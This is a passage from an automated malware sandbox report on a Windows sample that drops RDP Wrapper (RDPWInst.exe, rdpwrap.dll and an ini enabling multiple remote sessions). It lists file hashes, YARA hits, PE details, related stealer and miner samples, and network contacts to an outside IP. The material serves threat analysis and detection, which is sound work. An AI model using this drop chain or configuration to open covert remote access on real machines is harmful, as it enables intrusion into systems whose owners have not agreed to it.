                                3b5074b1b5d032e5620f69f9f700ff0ehloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                • 172.67.140.92
                                2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                • 172.67.140.92
                                https://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                • 172.67.140.92
                                x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                • 172.67.140.92
                                file.exeGet hashmaliciousXmrigBrowse
                                • 172.67.140.92
                                http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exeGet hashmaliciousUnknownBrowse
                                • 172.67.140.92
                                STlUEqhwpx.exeGet hashmaliciousQuasarBrowse
                                • 172.67.140.92
                                EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 172.67.140.92
                                file.exeGet hashmaliciousCredential FlusherBrowse
                                • 172.67.140.92

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Program Files\RDP Wrapper\rdpwrap.dllhloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                  file.exeGet hashmaliciousRDPWrap ToolBrowse
                                    file.exeGet hashmaliciousRDPWrap ToolBrowse
                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse

                                                  Created / dropped Files

                                                  C:\Program Files\RDP Wrapper\rdpwrap.dll

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):116736
                                                  Entropy (8bit):5.884975745255681
                                                  Encrypted:false
                                                  SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                  MD5:461ADE40B800AE80A40985594E1AC236
                                                  SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                  SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                  SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                  • Antivirus: Virustotal, Detection: 57%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: hloRQZmlfg.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                  C:\Program Files\RDP Wrapper\rdpwrap.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  File Type:Generic INItialization configuration [SLPolicy]
                                                  Category:dropped
                                                  Size (bytes):443552
                                                  Entropy (8bit):5.4496544667416975
                                                  Encrypted:false
                                                  SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                  MD5:92BC5FEDB559357AA69D516A628F45DC
                                                  SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                  SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                  SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                  Malicious:false
                                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PQZFFJEVUNE1ASJZ_c565d4165b1cddd54ce69fdd41ea3e96af170_6949917b_04e90f10-59e5-485a-8fbc-2e65a023bd0f\Report.wer

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):1.2018820499323044
                                                  Encrypted:false
                                                  SSDEEP:192:l+fXFiSRFf0BU/qaWc+LyVkzuiFhZ24IO87:wYSIBU/qafcukzuiFhY4IO87
                                                  MD5:32991B0496678D5AF9FD65F67AAC020B
                                                  SHA1:264E9A8153468A5B414FB6D72953AB4180B7BA06
                                                  SHA-256:FCFF70DCF81770B1CCE1B6249F1FADB2CFE385F29430A93E3B63E726EFC46C1E
                                                  SHA-512:09689FDE0FD7E3369E35AB7B6E9F209606E4CC42F08EB09BB08B4A8C6DD649E7F0406A5C180163283EE1957380710969695A73884065D313EF0D9D1B174F6DFD
                                                  Malicious:false
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.4.6.6.0.4.9.8.6.0.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.4.6.6.1.0.2.9.8.5.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.e.9.0.f.1.0.-.5.9.e.5.-.4.8.5.a.-.8.f.b.c.-.2.e.6.5.a.0.2.3.b.d.0.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.9.2.d.6.4.9.-.3.2.c.6.-.4.b.2.d.-.9.f.5.9.-.c.2.9.f.5.7.6.7.e.a.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...M.a.l.w.a.r.e.X.-.g.e.n...1.6.3.9.5...2.3.7.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.D.P.C.r.e.a.t.o.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.4.-.0.0.0.1.-.0.0.1.4.-.d.7.b.9.-.8.3.b.6.2.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.f.e.a.c.d.6.b.1.6.0.0.0.4.d.5.0.b.c.1.5.4.6.8.b.1.b.c.3.d.e.0.0.0.0.0.0.0.0.!.0.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7437.tmp.dmp

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 8 01:31:00 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):380341
                                                  Entropy (8bit):3.2563959260196413
                                                  Encrypted:false
                                                  SSDEEP:3072:mN+SLROjZ2Lc4uEqSyZp4LTgyeF0kbZhC1F:mNrNOjILc43yZ0TgPF0k4
                                                  MD5:61C9F6C98C2386EA58783A51469BB2A0
                                                  SHA1:6032B12BFDBFEA9A7D2C1EC3C7E1CDBB8C8D7408
                                                  SHA-256:99FEAA69630EC2BF3DF79F507AD324DCD4669E6A51737EA56FA33CA2885958B7
                                                  SHA-512:1F86051E4EA1E1E7C4D08D7DFC9BC36F99335121534F502D7028B4C85A60816585F28D3026611126816C7C374EF8807F4E423412C6D0B96AEEFF4B753DF30653
                                                  Malicious:false
                                                  Preview:MDMP..a..... .......T..g....................................<....).......*..D...........`.......8...........T............a...l..........,*...........,..............................................................................eJ.......,......GenuineIntel............T.......D...L..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7581.tmp.WERInternalMetadata.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8502
                                                  Entropy (8bit):3.7023559555371683
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJ47686Y9USUl1gmfZOwzpr3q89bcgsfRfl0m:R6lXJ0686YOSUl1gmfldczfN
                                                  MD5:A41CF9F85FED935F9A356FF2EE1343AC
                                                  SHA1:44C522267B96F9A4CB0396738923BB65828EADB3
                                                  SHA-256:326AED5BDF7A7242AAB5E050F366937AA4CBB94F465FFDE805DAE284B9F3A990
                                                  SHA-512:BE01EC7F7614EDE323B10F3D715190A41C4B6A4BDEAD804F14FB58F7E61E886058BB1604008382F3F88A48675DC3B8873E3D1B809FC87A51E3D394036C98FF7E
                                                  Malicious:false
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.8.<./.P.i.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER75A1.tmp.xml

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4896
                                                  Entropy (8bit):4.5737246520711095
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsAJg77aI9B7SWpW8VY6Ym8M4Jz3Fw+q8vkFKuQNNd:uIjfGI7L7z7VqJOK2KFNNd
                                                  MD5:ED469E14AD97BAECA43472FB67FBBF39
                                                  SHA1:970252D4E2F41E9AEA7C58557EFE2116D58E7566
                                                  SHA-256:B957988384C38378FF5324C040E5B59A375D5B7A4FB74FCA4F97F1248B972BEC
                                                  SHA-512:A810C82BFB15D459955F56A227A038A24DD9B70C114BB93B26B1D8B694285249A04CB9DF709A6E9D1AA1AE1F78F51765DCD94098DCE345CAB3DAA402FD79E789
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533793" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                  C:\Users\user\AppData\Local\Temp\RDPWInst.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1785344
                                                  Entropy (8bit):6.646511331349125
                                                  Encrypted:false
                                                  SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                  MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                  SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                  SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                  SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 78%, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................

                                                  C:\Windows\System32\rfxvmt.dll

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):37376
                                                  Entropy (8bit):5.7181012847214445
                                                  Encrypted:false
                                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.465763020237221
                                                  Encrypted:false
                                                  SSDEEP:6144:aIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbM:vXD94+WlLZMM6YFHP+M
                                                  MD5:BCB4CD0E537A8DFFB647261E44132AF1
                                                  SHA1:CBD684DF944D683519E8AB8AF0F6D42980581B31
                                                  SHA-256:DFF84F36BCA4A58320B59B386A085789EC1AC8E4B8734A8439A38B6E63ADB706
                                                  SHA-512:9551AE823B976DB8EE8C68AA5B11E57CEA4073EDDDF2F6816F7E3FFEB4AD17C8E331B9E541514F930B3B26EAF4B9D85B7169960038FED05E03131B76DDD60F31
                                                  Malicious:false
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..B.!...............................................................................................................................................................................................................................................................................................................................................YuU.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  \Device\ConDrv

                                                  Download File
                                                  Process:C:\Windows\System32\netsh.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):7
                                                  Entropy (8bit):2.2359263506290326
                                                  Encrypted:false
                                                  SSDEEP:3:t:t
                                                  MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                  SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                  SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                  SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                  Malicious:false
                                                  Preview:Ok.....

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.320178905368983
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  File size:12'800 bytes
                                                  MD5:5057d16e9fb573fb3924b9c3dba53260
                                                  SHA1:ea177b2f35ca01d2e128bd876e56a548c3f69007
                                                  SHA256:06e0a0da4cabec34eeb742c985b969260256aa15b50e14fddcc12eee7ac52fd2
                                                  SHA512:af4a46df974f2bdcff52bdda48d5a7440d8b022f919c2107d4f719fd6ee8a801341950420dd213fb062b67a4d11f480d9057a6363c81025cd477a5ab37b868db
                                                  SSDEEP:384:hE8XjVVt/97YdaQ5QFcWqUM6kYcV63UiJFnh:HzftmgQKdQYcV6kizh
                                                  TLSH:2D42090093E50076E639527E65255B0AAFB3D57F3D0797AF384C592E3FB219082137EA
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Oi............"...0............."6... ...@....@.. ....................................`................................

                                                  File Icon

                                                  Icon Hash:90cececece8e8eb0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x403622
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0xF215694F [Sat Sep 13 23:31:27 2098 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x35d00x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x141c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x35300x38.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x16280x18008069dbd47fbf6830d6c48ad5d9db9c27False0.5305989583333334data5.127352070786765IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x40000x141c0x1600f7d8ee7ab3d5878618789117b3cb15f1False0.3737571022727273data5.288126044255427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x60000xc0x200c0861df6173ac6f99708190d2e19c6c8False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x40900x254data0.45805369127516776
                                                  RT_MANIFEST0x42f40x1123XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.4043765671301573

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 8, 2024 03:30:54.014223099 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.019233942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.019306898 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.022650003 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.027539015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663557053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663614988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663650990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663681030 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.663685083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663722038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.663739920 CEST4973080192.168.2.4147.45.44.104
